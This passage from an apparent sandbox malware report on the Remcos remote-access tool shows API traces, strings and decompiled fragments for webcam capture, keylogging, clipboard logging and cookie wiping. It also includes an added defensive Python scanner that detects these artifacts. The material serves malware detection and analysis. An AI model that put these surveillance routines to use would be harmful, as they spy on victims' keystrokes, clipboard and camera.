                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A1D
                                        • tolower.MSVCRT ref: 00406A3A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                        Strings
                                        • [End of clipboard text], xrefs: 004069EC
                                        • [Ctrl + , xrefs: 00406996
                                        • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                        • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                        • API String ID: 1567161615-398269065
                                        • Opcode ID: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                        • Instruction ID: a9543fe512128afdcb68fc0767362bf76cb8ddc06e86ce3b10f85a644f0edd6d
                                        • Opcode Fuzzy Hash: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                        • Instruction Fuzzy Hash: 1141D571904708FBCB14F7E8E8499EFBB7CAB81300B14447BF403B3191DA795A598B5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                          • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                          • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                          • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                          • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 004077E7
                                        • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 004077EE
                                        • PathFileExistsA.SHLWAPI(?), ref: 004077FB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 0040781D
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407834
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                          • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                          • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                          • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                          • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                          • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407846
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040784F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000), ref: 00407884
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 0040789E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@D@1@@$wcscpy$FileFindwcscat$?begin@?$basic_string@?c_str@?$basic_string@CloseDirectoryRemoveV01@@$??4?$basic_string@??8std@@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@D@2@@0@EnvironmentExistsExpandFirstG@1@@NextOpenPathQueryStringsV01@V?$basic_string@Value
                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                        • API String ID: 4038348890-4073444585
                                        • Opcode ID: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                        • Instruction ID: e1c57ca4753d391c226bd1858ab1e9d7f4a425f5166415fba7c1daa74d5850da
                                        • Opcode Fuzzy Hash: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                        • Instruction Fuzzy Hash: 0F317F72904609EBCB00FBE0DD89DEE777CEB44345B104076F412A3190EB75AA49CBAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%
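The three API traces above leave string artifacts that are handy for triage: the wide-string command line `/sort "Visit Time" /stext "` (built from `basic_string@G`, i.e. wchar_t, so it lands in memory as UTF-16LE; the switch syntax matches NirSoft-style history viewers, which is an inference, not a statement the report makes), the clipboard-paste markers `[Ctrl + V][Following text has been pasted from clipboard:]` / `[End of clipboard text]`, and the IE-cookie wipe strings together with the `User Shell Folders` registry path. The scanner below is an added example written for this page, not code from the report or from the sample; it searches a memory dump or unpacked image for those strings in both ANSI and UTF-16LE, groups hits by the capability they evidence (the grouping is the editor's), and pulls pasted clipboard text out of a captured keylog, assuming the log lays a paste out as start marker, text, end marker in the order the concatenations at 00406A01/00406A0B suggest. The dump and keylog inputs are constructed for the example.

```python
"""Added example (not part of the Joe Sandbox report): scan a memory dump
or unpacked PE for the Remcos string artifacts listed in the API traces,
in ANSI and UTF-16LE, and extract clipboard pastes from a keylog."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Strings taken verbatim from the API traces on this page, grouped by the
# capability they evidence. The grouping is the editor's, not the report's.
INDICATORS = {
    "browser_history_dump": ['/sort "Visit Time" /stext "'],
    "clipboard_keylog": [
        "[Ctrl + V][Following text has been pasted from clipboard:]",
        "[End of clipboard text]",
    ],
    "ie_cookie_wipe": [
        "[IE cookies cleared!]",
        "[IE cookies not found]",
        r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders",
    ],
}

PASTE_START = "[Ctrl + V][Following text has been pasted from clipboard:]"
PASTE_END = "[End of clipboard text]"


@dataclass(frozen=True)
class Hit:
    capability: str
    indicator: str
    encoding: str  # "ansi" or "utf16le"
    offset: int


def _compile_patterns():
    # Every indicator becomes two byte patterns: the narrow form and the
    # wchar_t form the sample uses when it builds command lines and paths.
    out = []
    for cap, strings in INDICATORS.items():
        for s in strings:
            out.append((cap, s, "ansi", re.compile(re.escape(s.encode("ascii")))))
            out.append((cap, s, "utf16le", re.compile(re.escape(s.encode("utf-16-le")))))
    return out


_PATTERNS = _compile_patterns()


def scan(blob: bytes) -> list[Hit]:
    """Return every indicator occurrence in blob, ordered by offset."""
    hits = [Hit(cap, s, enc, m.start())
            for cap, s, enc, pat in _PATTERNS
            for m in pat.finditer(blob)]
    hits.sort(key=lambda h: h.offset)
    return hits


def capabilities(blob: bytes) -> dict[str, int]:
    """Capability -> number of distinct indicator strings seen (any encoding)."""
    seen: dict[str, set[str]] = {}
    for h in scan(blob):
        seen.setdefault(h.capability, set()).add(h.indicator)
    return {cap: len(names) for cap, names in seen.items()}


def extract_pastes(keylog: str) -> list[str]:
    """Text between the paste start and end markers, one entry per paste.
    Assumes start marker, pasted text, end marker (inferred from the
    concatenation order in the trace; not documented by the report)."""
    pat = re.compile(re.escape(PASTE_START) + r"(.*?)" + re.escape(PASTE_END), re.S)
    return [m.group(1) for m in pat.finditer(keylog)]


# Constructed sample dump: filler around three artifacts, with the history
# dump switch stored as UTF-16LE the way the sample's wide-string code emits it.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"[End of clipboard text]\x00"
    + b"\x90" * 8
    + '/sort "Visit Time" /stext "'.encode("utf-16-le")
    + b"\x00\x00"
    + b"[IE cookies cleared!]\x00"
    + b"\xcc" * 4
)

# Constructed sample keylog with two pastes surrounded by ordinary keystrokes.
SAMPLE_KEYLOG = (
    "login: admin" + PASTE_START + "hunter2" + PASTE_END + " [Enter]"
    + PASTE_START + "second paste" + PASTE_END
)

if __name__ == "__main__":
    for h in scan(SAMPLE_DUMP):
        print(f"{h.offset:#08x} {h.encoding:8s} {h.capability:22s} {h.indicator!r}")
    print(capabilities(SAMPLE_DUMP))
    print(extract_pastes(SAMPLE_KEYLOG))
```

Run it against a process dump such as the `00000007.00000002.664656928.0000000000400000` region the report samples; a hit on the UTF-16LE form of the `/stext` switch alone is a strong sign the unpacked Remcos payload is in that region, since packers rarely leave wide-string command lines intact.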

                                        C-Code - Quality: 19%
                                        			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
                                        				char _v20;
                                        				char _v36;
                                        				void* __ebp;
                                        				void* _t22;
                                        				void* _t23;
                                        				void* _t32;
                                        				char* _t33;
                                        				void* _t36;
                                        				void* _t38;
                                        				signed char _t39;
                                        				signed char _t41;
                                        				char* _t42;
                                        				int _t43;
                                        				intOrPtr _t65;
                                        				signed char _t66;
                                        				void* _t68;
                                        				intOrPtr* _t71;
                                        
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t65 =  *__eax;
                                        				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                        				_t71 = _t68 + 0x24;
                                        				_t22 = _t65 - 0x3c;
                                        				if(_t22 == 0) {
                                        					_t23 = E0040180C( &_v20, __eflags, 0);
                                        					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					_t66 = E00406DD9(_t23);
                                        					__eflags = _t66;
                                        					if(_t66 != 0) {
                                        						 *0x41b2ec = E00407033(_t66, "OpenCamera");
                                        						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
                                        						 *0x41b2f4 = E00407033(_t66, "GetFrame");
                                        						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
                                        						 *0x41b2e8 = 1;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                        						_push(0x1b);
                                        						goto L15;
                                        					}
                                        				} else {
                                        					_t32 = _t22 - 1;
                                        					if(_t32 == 0) {
                                        						__eflags =  *0x41b2e9;
                                        						if(__eflags != 0) {
                                        							goto L8;
                                        						}
                                        					} else {
                                        						_t36 = _t32 - 1;
                                        						if(_t36 == 0) {
                                        							 *0x41b2f0();
                                        							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
                                        						} else {
                                        							_t38 = _t36 - 1;
                                        							if(_t38 == 0) {
                                        								_t39 =  *0x41b2ec();
                                        								__eflags = _t39;
                                        								 *0x41b2e9 = _t39;
                                        								if(__eflags == 0) {
                                        									goto L9;
                                        								} else {
                                        									L8:
                                        									_t33 = E0040180C( &_v20, __eflags, 0);
                                        									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        									_push(atoi(_t33));
                                        									_push(_a4);
                                        									E00401EA2(__eflags);
                                        								}
                                        							} else {
                                        								if(_t38 == 1) {
                                        									_t41 =  *0x41b2ec();
                                        									_t81 = _t41;
                                        									 *0x41b2e9 = _t41;
                                        									if(_t41 == 0) {
                                        										L9:
                                        										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                        										_push(0x41);
                                        										L15:
                                        										E004020C2(_a4);
                                        									} else {
                                        										_t42 = E0040180C( &_v20, _t81, 0);
                                        										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        										_t43 = atoi(_t42);
                                        										 *_t71 = 0x3e8;
                                        										Sleep(??);
                                        										E00401EA2(_t81);
                                        										 *0x41b2f0(_a4, _t43);
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				E004017DD( &_v20);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}
                                        Instruction addresses mapped to the decompiled lines above: 0x00401cd9 .. 0x00401ea1 (address column, originally shown beside the code)

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 00401CF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401D01
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                        • atoi.MSVCRT ref: 00401D67
                                        • Sleep.KERNEL32 ref: 00401D76
                                          • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                          • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                          • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                        • atoi.MSVCRT ref: 00401DB4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                        • API String ID: 3050406488-3547787478
                                        • Opcode ID: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                        • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                        • Opcode Fuzzy Hash: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                        • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 33%
                                        			E00405DD3(void* __ecx, char _a4) {
                                        				struct _SYSTEMTIME _v20;
                                        				char _v36;
                                        				char _v52;
                                        				char* _t24;
                                        				char* _t25;
                                        				char* _t33;
                                        				int _t34;
                                        				void* _t46;
                                        				void* _t47;
                                        
                                        				_t47 = __ecx;
                                        				GetLocalTime( &_v20);
                                        				_t24 =  &_v52;
                                        				L00414176();
                                        				_t25 =  &_v36;
                                        				L00414170();
                                        				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				_t46 = malloc(_t25 + 0x64);
                                        				_t33 = _v20.wYear & 0x0000ffff;
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
                                        				_t34 = sprintf(_t46, _t33);
                                        				if( *((char*)(_t47 + 0x3c)) != 0) {
                                        					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                        				}
                                        				if( *((char*)(_t47 + 0x3d)) != 0) {
                                        					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                        					_t20 = _t47 + 0x34; // 0x0
                                        					_t34 = SetEvent( *_t20);
                                        				}
                                        				free(_t46);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return _t34;
                                        			}


                                        APIs
                                        • GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                        • malloc.MSVCRT ref: 00405E37
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                        • sprintf.MSVCRT ref: 00405E69
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                        • SetEvent.KERNEL32(00000000), ref: 00405E95
                                        • free.MSVCRT(00000000), ref: 00405E9C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                        • API String ID: 2201004561-248792730
                                        • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                        • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                        • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                        • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
